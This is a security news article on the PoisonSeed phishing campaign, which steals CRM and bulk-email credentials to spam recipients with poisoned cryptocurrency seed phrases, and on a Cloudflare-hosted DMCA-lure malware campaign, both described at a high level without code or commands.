A malicious campaign called PoisonSeed is using compromised credentials associated with customer relationship management (CRM) tools & bulk email providers to send spam messages containing cryptocurrency seed phrases in an attempt to steal from victims’ digital wallets.
“Recipients of the bulk spam are targeted with a cryptocurrency seed phrase poisoning attack,” Silent Push said in an analysis. “As part of the attack, PoisonSeed provides security seed phrases to get potential victims to copy & paste them into new cryptocurrency wallets for future compromising.”
Targets
Targets of PoisonSeed include enterprise organisations & individuals outside the cryptocurrency industry. Crypto companies like Coinbase & Ledger, & bulk email providers such as Mailchimp, SendGrid, Hubspot, Mailgun, & Zoho are among the targeted crypto companies.
The activity is believed to be distinct from 2 loosely aligned threat actors Scattered Spider & CryptoChameleon, which are both part of a broader cybercrime group called The Com. Some aspects of the campaign were previously disclosed by security researcher Troy Hunt & Bleeping Computer last month.
‘Lookalike’
The attacks involve the threat players setting up ‘lookalike’ phishing pages for prominent CRM & bulk email companies, aiming to trick high-value targets into providing their credentials.
Once the credentials are obtained, the adversaries proceed to create an API key to ensure persistence even if the stolen password is reset by its owner.
Next, the operators export mailing lists likely using an automated tool & send spam from those compromised accounts. The post-CRM-compromise supply chain spam messages tell users that they need to set up a new Coinbase Wallet using the seed phrase embedded in the email.
Hijack the Accounts
The goal of the attacks is to use the same recovery phrase to hijack the accounts & transfer funds from those wallets.
The links to Scattered Spider & CryptoChameleon are from the use of a domain (“mailchimp-sso[.]com”) that has been previously identified as used by the former, as well as CryptoChameleon’s historical targeting of Coinbase & Ledger.
Russian-Speaking
In addition, the phishing kit used by PoisonSeed does not share any similarity with those used by the other 2 threat clusters, meaning that it’s either a brand new phishing kit from CryptoChameleon or it’s a different threat player that just happens to use similar tools.
This comes as a Russian-speaking threat player has been observed using phishing pages hosted on Cloudflare Pages.Dev & Workers.Dev to deliver malware that can remotely control infected Windows hosts. A previous iteration of the campaign also distributed the StealC information stealer.
Cloudflare
“This recent campaign leverages Cloudflare-branded phishing pages themed around DMCA (Digital Millennium Copyright Act) takedown notices served across multiple domains,” Hunt.io said.
“The lure abuses the ms-search protocol to download a malicious LNK file disguised as a PDF via a double extension. Once executed, the malware checks in with an attacker-operated Telegram bot-sending the victim’s IP address-before transitioning to Pyramid C2 to control the infected host.”
